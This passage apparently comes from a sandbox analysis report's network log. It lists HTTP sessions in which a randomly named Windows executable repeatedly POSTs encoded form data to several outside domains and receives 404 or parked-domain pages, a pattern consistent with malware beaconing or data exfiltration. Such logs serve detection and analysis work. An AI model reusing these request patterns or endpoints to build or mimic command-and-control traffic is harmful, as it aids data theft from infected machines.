                                  29 | 192.168.2.7 | 49740 | 216.40.34.41 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:36:00.157306910 CEST | 745 | OUT | POST /nsxv/ HTTP/1.1
                                  Host: www.kohfour.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.kohfour.com
                                  Connection: close
                                  Content-Length: 215
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.kohfour.com/nsxv/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Ascii: 4h=kaGpSeuXVqneEYnopoSdnAW0oqBhEv2TypKXX3Ji8McZsifqeehVorGfnBD9DimHWZLfz0/EW3D/VSrEtvVy0S7DASZygft+sf8KRao+nVnZ8mFS9f2dwbzkR7YtmX5VVF2IUtvFIA3OCyhkE10wwwP7JUbbtcnG1ZwDAlYdDzcwYewXAGMnhe1oydbMw2ntlWwdh7raDSWFRN8Pzg==
                                  May 27, 2024 12:36:00.901982069 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                  content-type: text/html; charset=UTF-8
                                  x-request-id: 79a5c675-0b3b-4edd-85ca-0e1298f8c6ac
                                  x-runtime: 0.035627
                                  content-length: 18201
                                  connection: close
                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                  May 27, 2024 12:36:00.902049065 CEST | 224 | IN
                                  Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source {
                                  May 27, 2024 12:36:00.902080059 CEST | 1236 | IN
                                  Data Ascii: border: 1px solid #D9D9D9; background: #ECECEC; width: 978px; } .source pre { padding: 10px 0px; border: none; } .source .data { font-size: 80%; overflow: auto; background-colo
                                  May 27, 2024 12:36:00.902131081 CEST | 1236 | IN
                                  Data Ascii: e: textfield; } #route_table tbody tr { border-bottom: 1px solid #ddd; } #route_table tbody tr:nth-child(odd) { background: #f2f2f2; } #route_table tbody.exact_matches, #route_table tbody.fuzzy_matches { background
                                  May 27, 2024 12:36:00.902183056 CEST | 1236 | IN
                                  Data Ascii: /header><div id="container"> <h2>No route matches [POST] &quot;/nsxv&quot;</h2> <p><code>Rails.root: /hover-parked</code></p><div id="traces"> <a href="#" onclick="hide(&#39;Framework-Trace&#39;);hide(&#39;Full-Trace&#39;);show(&#
                                  May 27, 2024 12:36:00.902230978 CEST | 1236 | IN
                                  Data Ascii: data-frame-id="3" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `block in call&#39;</a><br><a class="trace-frames" data-frame-id="4" href="#">activesupport (5.2.6) lib/active_support/tagged_logging.rb:71:in `block in tagged&#39;</a>
                                  May 27, 2024 12:36:00.902266979 CEST | 836 | IN
                                  Data Ascii: ntime.rb:22:in `call&#39;</a><br><a class="trace-frames" data-frame-id="13" href="#">activesupport (5.2.6) lib/active_support/cache/strategy/local_cache_middleware.rb:29:in `call&#39;</a><br><a class="trace-frames" data-frame-id="14" href="#">
                                  May 27, 2024 12:36:00.902318954 CEST | 1236 | IN
                                  Data Ascii: frame-id="19" href="#">puma (4.3.9) lib/puma/server.rb:718:in `handle_request&#39;</a><br><a class="trace-frames" data-frame-id="20" href="#">puma (4.3.9) lib/puma/server.rb:472:in `process_client&#39;</a><br><a class="trace-frames" data-frame
                                  May 27, 2024 12:36:00.902376890 CEST | 224 | IN
                                  Data Ascii: ><br><a class="trace-frames" data-frame-id="5" href="#">activesupport (5.2.6) lib/active_support/tagged_logging.rb:28:in `tagged&#39;</a><br><a class="trace-frames" data-frame-id="6" href="#">activesupport (5.2.6) lib/active
                                  May 27, 2024 12:36:00.902405024 CEST | 1236 | IN
                                  Data Ascii: _support/tagged_logging.rb:71:in `tagged&#39;</a><br><a class="trace-frames" data-frame-id="7" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `call&#39;</a><br><a class="trace-frames" data-frame-id="8" href="#">actionpack (5.2.6) lib
                                  May 27, 2024 12:36:00.902700901 CEST | 1236 | IN
                                  Data Ascii: <a class="trace-frames" data-frame-id="16" href="#">rack (2.2.3) lib/rack/sendfile.rb:110:in `call&#39;</a><br><a class="trace-frames" data-frame-id="17" href="#">railties (5.2.6) lib/rails/engine.rb:524:in `call&#39;</a><br><a class="trace-fr


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  30 | 192.168.2.7 | 49741 | 216.40.34.41 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:36:02.701807976 CEST | 765 | OUT | POST /nsxv/ HTTP/1.1
                                  Host: www.kohfour.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.kohfour.com
                                  Connection: close
                                  Content-Length: 235
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.kohfour.com/nsxv/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Ascii: 4h=kaGpSeuXVqneE7PolpSdhgW1nKBhNP2fypWXXyxI7+4ZsDvqfaNVlLGfvhDyHimcWZHXz2rEW0//VS7Et4B11C7NNyZwkft+sf8KRa8UnUPZ/WZS+9OesLzrHLYtxH5RVF3tUoKqICfOC2lkEk0z+APxH0aMsuDP74I8MWQhHxpbZot1akAL/PNT2f/6nQ6YnX0FsZf7clzvcfdLlRoqX3mJQZmHBqEUXmUvJ0I=
                                  May 27, 2024 12:36:03.248888969 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                  content-type: text/html; charset=UTF-8
                                  x-request-id: 431f0c0c-0669-4d9d-b651-95d48a5a0839
                                  x-runtime: 0.033628
                                  content-length: 18221
                                  connection: close
                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                  May 27, 2024 12:36:03.248913050 CEST | 1236 | IN
                                  Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                  May 27, 2024 12:36:03.248924017 CEST | 1236 | IN
                                  Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                  May 27, 2024 12:36:03.248959064 CEST | 672 | IN
                                  Data Ascii: var toggleSessionDump = function() { return toggle('session_dump'); } var toggleEnvDump = function() { return toggle('env_dump'); } </script></head><body><header> <h1>Routing Error</h1></header><div id="c
                                  May 27, 2024 12:36:03.248971939 CEST | 1236 | IN
                                  Data Ascii: amework Trace</a> | <a href="#" onclick="hide(&#39;Application-Trace&#39;);hide(&#39;Framework-Trace&#39;);show(&#39;Full-Trace&#39;);; return false;">Full Trace</a> <div id="Application-Trace" style="display: block;"> <pre><co
                                  May 27, 2024 12:36:03.248981953 CEST | 1236 | IN
                                  Data Ascii: (5.2.6) lib/active_support/tagged_logging.rb:71:in `tagged&#39;</a><br><a class="trace-frames" data-frame-id="7" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `call&#39;</a><br><a class="trace-frames" data-frame-id="8" href="#">acti
                                  May 27, 2024 12:36:03.248995066 CEST | 1236 | IN
                                  Data Ascii: `call&#39;</a><br><a class="trace-frames" data-frame-id="16" href="#">rack (2.2.3) lib/rack/sendfile.rb:110:in `call&#39;</a><br><a class="trace-frames" data-frame-id="17" href="#">railties (5.2.6) lib/rails/engine.rb:524:in `call&#39;</a><br>
                                  May 27, 2024 12:36:03.249068022 CEST | 1236 | IN
                                  Data Ascii: race-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `block in call&#39;</a
                                  May 27, 2024 12:36:03.249203920 CEST | 328 | IN
                                  Data Ascii: ="#">rack (2.2.3) lib/rack/method_override.rb:24:in `call&#39;</a><br><a class="trace-frames" data-frame-id="12" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `call&#39;</a><br><a class="trace-frames" data-frame-id="13" href="#">activesuppor
                                  May 27, 2024 12:36:03.249264002 CEST | 1236 | IN
                                  Data Ascii: ;</a><br><a class="trace-frames" data-frame-id="14" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/executor.rb:14:in `call&#39;</a><br><a class="trace-frames" data-frame-id="15" href="#">actionpack (5.2.6) lib/action_dispatch/middl
                                  May 27, 2024 12:36:03.256922960 CEST | 1236 | IN
                                  Data Ascii: es'); var selectedFrame, currentSource = document.getElementById('frame-source-0'); // Add click listeners for all stack frames for (var i = 0; i < traceFrames.length; i++) { traceFrames[i].addEventListener('click', function


                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                  31          192.168.2.7  49742        216.40.34.41    80                6704  C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp                              Bytes transferred  Direction  Data
                                  May 27, 2024 12:36:05.416882038 CEST   1778               OUT        POST /nsxv/ HTTP/1.1
                                  Host: www.kohfour.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.kohfour.com
                                  Connection: close
                                  Content-Length: 1247
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.kohfour.com/nsxv/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:36:05.968329906 CEST   1236               IN         HTTP/1.1 404 Not Found
                                  content-type: text/html; charset=UTF-8
                                  x-request-id: fb8f3bc5-976b-429d-b4db-f4281f33cc3c
                                  x-runtime: 0.029723
                                  content-length: 19233
                                  connection: close
                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]


                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                  32          192.168.2.7  49743        216.40.34.41    80                6704  C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp                              Bytes transferred  Direction  Data
                                  May 27, 2024 12:36:08.188399076 CEST   486                OUT        GET /nsxv/?4h=pYuJRq+8cLDcL7HBjbC+/g/Mh4BWEuLgiK2rXGhb3IwhxBD1Y9l6lru26CW/IEGwQ6X80EHXbCPAETHU89p1owS3Fy9cgcx9jNYuN7s7s2Oj/CYEgsKi16b0MMZfzW5XOEPuTfm+FgSa&623=YLI8v8eXd0Y HTTP/1.1
                                  Host: www.kohfour.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:36:08.679944038 CEST   1236               IN         HTTP/1.1 200 OK
                                  x-frame-options: SAMEORIGIN
                                  x-xss-protection: 1; mode=block
                                  x-content-type-options: nosniff
                                  x-download-options: noopen
                                  x-permitted-cross-domain-policies: none
                                  referrer-policy: strict-origin-when-cross-origin
                                  content-type: text/html; charset=utf-8
                                  etag: W/"bfcea5e971df5e9cceba933a2e06d12c"
                                  cache-control: max-age=0, private, must-revalidate
                                  x-request-id: bc7030f2-685a-4eca-9e0b-5e287dadc778
                                  x-runtime: 0.003515
                                  transfer-encoding: chunked
                                  connection: close
                                  Data Ascii: 17D9<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>kohfour.com is expired</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://www.hover.com/?source=expired"><


                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                  33          192.168.2.7  49744        203.161.43.228  80                6704  C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp                              Bytes transferred  Direction  Data
                                  May 27, 2024 12:36:14.813744068 CEST   754                OUT        POST /sdqf/ HTTP/1.1
                                  Host: www.getmall.online
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.getmall.online
                                  Connection: close
                                  Content-Length: 215
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.getmall.online/sdqf/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Ascii: 4h=yWOdrWB6v5zqFAvXOkYnEjOQdT+QdocqfmaNsHkO5clCtisVNEP5/vODEyscaOmdaV1F7l5GgHwfp+khqwmgzdmUo+4TiwfjaAag+HvHLaVEt1V9a5KgWGKb/qyvNU3Po+QUGzTRJUPSjHL8jaYgq4gL2gb62lv0+EEjQfA8RCWyqO2wXnS2cKFFgUMfFo1NbKgd4zC4yjcf1SFaVw==
                                  May 27, 2024 12:36:15.453954935 CEST   658                IN         HTTP/1.1 404 Not Found
                                  Date: Mon, 27 May 2024 10:36:15 GMT
                                  Server: Apache
                                  Content-Length: 514
                                  Connection: close
                                  Content-Type: text/html
                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                  34          192.168.2.7  49745        203.161.43.228  80                6704  C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp                              Bytes transferred  Direction  Data
                                  May 27, 2024 12:36:17.351732969 CEST   774                OUT        POST /sdqf/ HTTP/1.1
                                  Host: www.getmall.online
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.getmall.online
                                  Connection: close
                                  Content-Length: 235
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.getmall.online/sdqf/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Ascii: 4h=yWOdrWB6v5zqEkTXJEknGDOTEj+QXIc2fmWNsGge5vNCtHIVMFP5qvODPStXQumGaVJ37k1GgHUfp88hrHyj1NmWle4VsQfjaAag+HLtLaNEtkl9bYKhIWKc1KyvcE3Lo+Q2GwX7JX3SjFT8gP4jg4gJyga+3FP+7x8hfs8zTiOyr4rSNFeaCb9+kWopSOo4ZLkF1R2ZtU514AkeDDpzh/R0+YXZ0g7pYYJXuhg=
                                  May 27, 2024 12:36:17.963094950 CEST   658                IN         HTTP/1.1 404 Not Found
                                  Date: Mon, 27 May 2024 10:36:17 GMT
                                  Server: Apache
                                  Content-Length: 514
                                  Connection: close
                                  Content-Type: text/html
                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                  35          192.168.2.7  49746        203.161.43.228  80                6704  C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp                              Bytes transferred  Direction  Data
                                  May 27, 2024 12:36:19.883435965 CEST   1787               OUT        POST /sdqf/ HTTP/1.1
                                  Host: www.getmall.online
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.getmall.online
                                  Connection: close
                                  Content-Length: 1247
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.getmall.online/sdqf/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:36:20.481769085 CEST   658                IN         HTTP/1.1 404 Not Found
                                  Date: Mon, 27 May 2024 10:36:20 GMT
                                  Server: Apache
                                  Content-Length: 514
                                  Connection: close
                                  Content-Type: text/html
                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                  36          192.168.2.7  49747        203.161.43.228  80                6704  C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp                              Bytes transferred  Direction  Data
                                  May 27, 2024 12:36:22.416069984 CEST   489                OUT        GET /sdqf/?4h=/Um9ojVdkbfnISaoGVsuQzSOUzKaaLgSbEiIsV4+zKdo/XoiJWjCg4n0fCMWfuuxI3x/+HlmtSdoreUzjia5ktzQg+QfuhD9Tyqg/FbSK60Z9xhxRrThQnyA3fP8fU7MydtKBAbYK1CU&623=YLI8v8eXd0Y HTTP/1.1
                                  Host: www.getmall.online
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:36:23.031091928 CEST | 673 | IN | HTTP/1.1 404 Not Found
                                  Date: Mon, 27 May 2024 10:36:22 GMT
                                  Server: Apache
                                  Content-Length: 514
                                  Connection: close
                                  Content-Type: text/html; charset=utf-8
                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  37 | 192.168.2.7 | 49748 | 188.114.96.3 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:36:28.271959066 CEST | 733 | OUT | POST /yfa0/ HTTP/1.1
                                  Host: www.uqdr.cn
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.uqdr.cn
                                  Connection: close
                                  Content-Length: 215
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.uqdr.cn/yfa0/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Ascii: 4h=5UJjv/DAPek3V19KBdROXMrnmsTvgRQNmnSUVLVzBnrkI+F1ZEuH4MKvcZh1lfacW5LpduTul4xRm7muwuxGE4XyGBC3X1fUK8NBwgcok4o56SyG0Y7zgReTzeEbUuMcwftg9TRtR8G0nh51ZLN4D9RdRUc8VWlBTjXegX0wACeePiyS2oEigmF6MttmZiNygj5qLoBsjKikeEXDdA==
                                  May 27, 2024 12:36:28.875396967 CEST | 645 | IN | HTTP/1.1 200 OK
                                  Date: Mon, 27 May 2024 10:36:28 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  X-Powered-By: Nginx
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B%2BxcV8ZBhKu%2FEHQhyu4GYMPuNtwPYkwxsrO5fHtoNV22x%2Fh4a5MoXo4v0JcXaVyVvoVfEwRoZAEI6EKiHY2jP4tjKqtgV5O7q%2BCwgB%2Foo8%2BAEpJgDcKPWTw2LMM%2FyA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 88a55d374f744295-EWR
                                  Content-Encoding: gzip
                                  alt-svc: h3=":443"; ma=86400


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  38 | 192.168.2.7 | 49749 | 188.114.96.3 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:36:30.809752941 CEST | 753 | OUT | POST /yfa0/ HTTP/1.1
                                  Host: www.uqdr.cn
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.uqdr.cn
                                  Connection: close
                                  Content-Length: 235
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.uqdr.cn/yfa0/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Ascii: 4h=5UJjv/DAPek3UUNKD6lOAcrm68Tv7hQBmneUVKQoBVfkLf11eFuH7MKvT5hwq/aVW5PhdsHul4lRm+KuwfxFHIXKOhC1T1fUK8NBwgIWk4w57iiGm578jReQ6+EbDeMYwftS9SMAR/+0nkd1Z/h/N9RXOEdwblNIKyPQuE5pHAScH0vwsKIO+39BIvJQOEQHii9yGK1N89HOTW2HLw9ljH4vqXCj5eRFpIAv2X8=
                                  May 27, 2024 12:36:31.433845043 CEST | 1132 | IN | HTTP/1.1 200 OK
                                  Date: Mon, 27 May 2024 10:36:31 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  X-Powered-By: Nginx
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DJdmRjBKmQDruE32fv%2FLibwMfUZonIr7NCt%2Fq%2F1w2YjLGRsXVi%2FGUVFLMz8FtGFBVIgKxcS5SRYmOHnUl2hxtcGJsM2rU3MSo5ReQTzc5WLKxbtU2TeFCzeHK%2Fcaog%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 88a55d473dd98c5f-EWR
                                  Content-Encoding: gzip
                                  alt-svc: h3=":443"; ma=86400


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  39 | 192.168.2.7 | 49750 | 188.114.96.3 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:36:33.335088015 CEST | 1766 | OUT | POST /yfa0/ HTTP/1.1
                                  Host: www.uqdr.cn
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.uqdr.cn
                                  Connection: close
                                  Content-Length: 1247
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.uqdr.cn/yfa0/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:36:33.929122925 CEST | 645 | IN | HTTP/1.1 200 OK
                                  Date: Mon, 27 May 2024 10:36:33 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  X-Powered-By: Nginx
                                  CF-Cache-Status: DYNAMIC
